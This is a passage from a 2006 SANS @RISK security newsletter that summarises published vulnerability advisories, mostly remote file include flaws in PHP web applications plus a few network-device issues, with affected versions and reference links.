  • 06.51.60 - CVE: Not Available
  • Platform: Web Application
  • Title: phpProfiles Multiple Remote File Include Vulnerabilities
  • Description: phpProfiles is a web-based application. It is vulnerable to multiple remote file include issues due to improper sanitization of user-supplied input to various scripts. phpProfiles versions 3.1.2b and earlier are affected.
  • Ref: http://www.securityfocus.com/bid/21667
  • 06.51.61 - CVE: Not Available
  • Platform: Web Application
  • Title: cwmCounter Statistic.PHP Remote File Include
  • Description: cwmCounter is a PHP based application that keeps track of the number of visitors visiting a web site. Insufficient sanitization of the "path" parameter of the "statistic.php" script exposes the application to a remote file include issue. cwmCounter version 5.1.1 is affected.
  • Ref: http://www.securityfocus.com/bid/21671
  • 06.51.62 - CVE: Not Available
  • Platform: Web Application
  • Title: Typo3 Class.TX_RTEHTMLArea_PI1.PHP Multiple Remote Command Execution Vulnerabilities
  • Description: TYPO3 is a content management system. It is vulnerable to multiple issues that permit the execution of arbitrary system commands due to insufficient sanitization of user-supplied data to the "userUid" parameter and an unspecified parameter of the "/sysext/rtehtmlarea/pi1/class.tx_rtehtmlarea_pi1.php" script. TYPO3 versions 4.0 to 4.0.3 and 4.1beta are vulnerable; versions 3.7 and 3.8 are also vulnerable if they have the optional "rtehtmlarea" extension installed.
  • Ref: http://www.securityfocus.com/archive/1/454944
  • 06.51.63 - CVE: Not Available
  • Platform: Web Application
  • Title: Valdersoft Shopping Cart Common.PHP Remote File Include
  • Description: Valdersoft Shopping Cart is a PHP based shopping cart application. It is prone to a remote file include vulnerability due to insufficient sanitization of the "commonIncludePath" parameter of the "common.php" script. Valdersoft Shopping Cart version 3.0 is reportedly vulnerable.
  • Ref: http://www.securityfocus.com/bid/21685
  • 06.51.64 - CVE: Not Available
  • Platform: Web Application
  • Title: Computer Associates Multiple CleverPath Portal Environments Session Hijacking
  • Description: Computer Associates multiple CleverPath Portal environments are web-based portal applications. These applications are exposed to a session hijacking issue when multiple CleverPath Portal Environments are sharing a common data store at exactly same time. Computer Associates Workload Control Center versions 1.0 SP4 and prior are affected. Ref: http://supportconnectw.ca.com/public/ca_common_docs/cpportal_secnot.asp
  • 06.51.65 - CVE: Not Available
  • Platform: Web Application
  • Title: cwmExplorer Index.PHP Source Code Information Disclosure
  • Description: cwmExplorer is a web-based file and folder browsing application implemented in PHP. The application is exposed an information disclosure issue due to insufficient sanitization of user-supplied input to the "show_file" parameter of the "index.php" script. cwmExplorer version 1.0 is affected.
  • Ref: http://www.securityfocus.com/bid/21683
  • 06.51.66 - CVE: Not Available
  • Platform: Web Application
  • Title: Web-App.Org and Web-App.Net Multiple Input Validation Vulnerabilities
  • Description: Web-APP.org and Web-APP.net are web portal applications. They are affected by multiple cross-site and filter-bypass vulnerabilities. Web-APP.net version 0.9.9.3.4NE and Web-APP.org version 0.9.9.4 are affected.
  • Ref: http://www.securityfocus.com/bid/21684
  • 06.51.67 - CVE: CVE-2006-2658
  • Platform: Web Application
  • Title: Mono XSP Source Code Information Disclosure
  • Description: XSP is a web server designed to serve ASP.NET applications. It is vulnerable to a source code disclosure issue due to insufficient sanitization of user-supplied input. Mono XSP version 2.0 rev 68766 resolves this issue.
  • Ref: http://www.securityfocus.com/archive/1/454962
  • 06.51.68 - CVE: Not Available
  • Platform: Web Application
  • Title: TextSend Sender.PHP Remote File Include
  • Description: TextSend is an SMS messaging script. It is vulnerable to a remote file include issue due to insufficient sanitization of user-supplied input to the "ROOT_PATH" parameter of the "config/sender.php" script. Version 1.5 is affected.
  • Ref: http://www.securityfocus.com/bid/21690
  • 06.51.69 - CVE: Not Available
  • Platform: Web Application
  • Title: PgmReloaded Multiple Remote File Include Vulnerabilities
  • Description: PgmReloaded is a simple CMS for e-commerce and generic web catalogs application. It is exposed to multiple remote file include vulnerabilities because it fails to sufficiently sanitize user-supplied input to multiple parameters of different scripts. Version 0.8.5 is affected.
  • Ref: http://www.securityfocus.com/bid/21696
  • 06.51.70 - CVE: Not Available
  • Platform: Web Application
  • Title: Newxooper Mapage.PHP Remote File Include
  • Description: Newxooper is a web-based content management system (CMS). It is prone to a remote file include issue because it fails to sufficiently sanitize user-supplied input to the "chemin" parameter of the "mapage.php" script. Newxooper version 0.9.1 is vulnerable and other versions may also be affected.
  • Ref: http://www.milw0rm.com/exploits/2970
  • 06.51.71 - CVE: CVE-2006-6589
  • Platform: Web Application
  • Title: OFBiz Search_String Parameter HTML Injection
  • Description: OFBiz is an ecommerce solution implemented in Java. The application is prone to an HTML injection issue due to improper sanitization of user-supplied input before using it in dynamically generated content which affects "SEARCH_STRING" parameter while performing searches. OFBiz version 3.0.0 and opentaps version 0.9.3 are affected.
  • Ref: https://issues.apache.org/jira/browse/OFBIZ-260
  • 06.51.72 - CVE: Not Available
  • Platform: Web Application
  • Title: Calacode @Mail Webmail Filtering Engine HTML Injection
  • Description: Calacode @Mail is a web-based email client. It is exposed to an HTML injection issue due to improper sanitization of user-supplied input in the "Global.pm" perl module. CalaCode @Mail Webmail version 4.51 is affected.
  • Ref: http://www.securityfocus.com/bid/21708/info
  • 06.51.73 - CVE: Not Available
  • Platform: Web Application
  • Title: Hitachi Soumu Workflow Multiple Remote Authentication Bypass Vulnerabilities
  • Description: Hitachi Soumu Workflow is an application for workflow productivity. The application is exposed to multiple authentication bypass vulnerabilities because of a flaw in its authentication process. Hitachi Soumu Workflow versions 3.0 and prior are affected. Ref: http://www.hitachi-support.com/security_e/vuls_e/HS06-016_e/01-e.html
  • 06.51.74 - CVE: Not Available
  • Platform: Network Device
  • Title: Allied Telesis AT-9000/24 Ethernet Switch Unauthorized Management VLAN Access
  • Description: Allied Telesis AT-9000/24 devices are managed Ethernet switches. They are prone to an unauthorized management VLAN access issue. When multiple VLANs are configured, attackers can access the management VLAN by guessing the IP configuration that the management interface is configured to respond to.
  • Ref: http://www.securityfocus.com/bid/21628
  • 06.51.75 - CVE: CVE-2006-3896
  • Platform: Network Device
  • Title: NeoScale Systems CryptoStor Tape 700 Series Appliance SmartCard Authentication Bypass
  • Description: CryptoStor Tape is a tape backup encryption appliance. It is vulnerble to an unspecified authentication bypass issue. CryptoStor 700 series with firmware version prior to 2.6 are vulnerable.
  • Ref: http://www.kb.cert.org/vuls/id/339004
  • 06.51.76 - CVE: Not Available
  • Platform: Network Device
  • Title: HP Printer FTP Print Server List Command Buffer Overflow
  • Description: HP FTP Print Server is an application that allows computers to access various printers. It is vulnerable to a buffer overflow issue due to insufficient handling of multiple "LIST" and "NLIST" commands with arbitrary long strings. See the advisory for further details.
  • Ref: http://www.securityfocus.com/archive/1/454817

(c) 2006. All rights reserved. The information contained in this newsletter, including any external links, is provided "AS IS," with no express or implied warranty, for informational purposes only. In some cases, copyright for material in this newsletter may be held by a party other than Qualys (as indicated herein) and permission to use such material must be requested from the copyright owner.

Subscriptions: @RISK is distributed free of charge to people responsible for managing and securing information systems and networks. You may forward this newsletter to others with such responsibility inside or outside your organization.

Topical information that can immediately be applied and shared in the workplace.
-Blair Campbell, Bank of Nova Scotia

NetWars - Cyber Range

Latest Whitepapers

Building and Maintaining a "Certifiable" Workforce
By Robert J. Mavretich

How Can You Build and Leverage SNORT IDS Metrics to Reduce Risk?
By Tim Proffitt

Daisy Chain Authentication
By Courtney Imbert

Latest Tweets

NEW #SANS Survey: Security Analytics & Intelligence 2nd [...]
October 1, 2013 - 6:30 PM

Tips on how to convince your boss to let you train online wi [...]
October 1, 2013 - 6:23 PM

#2 Tip on how 2 convince your boss 2 let u train online: Fle [...]
October 1, 2013 - 3:00 PM

Contact Us

(301) 654-SANS (7267)
Mon-Fri 9am - 8pm EST/EDT
info@sans.org

"The amount of knowledge conveyed and technical diving by practical hands-on was well balanced."
- Aaron Moore, Maricopa County

"The perfect balance of theory and hands-on experience."
- James D. Perry II, University of Tennessee

"Expertise of the trainer is impressive, real life situations explained, very good manuals. Best training ever!"
- Jerry Robles de Medina, Godo CU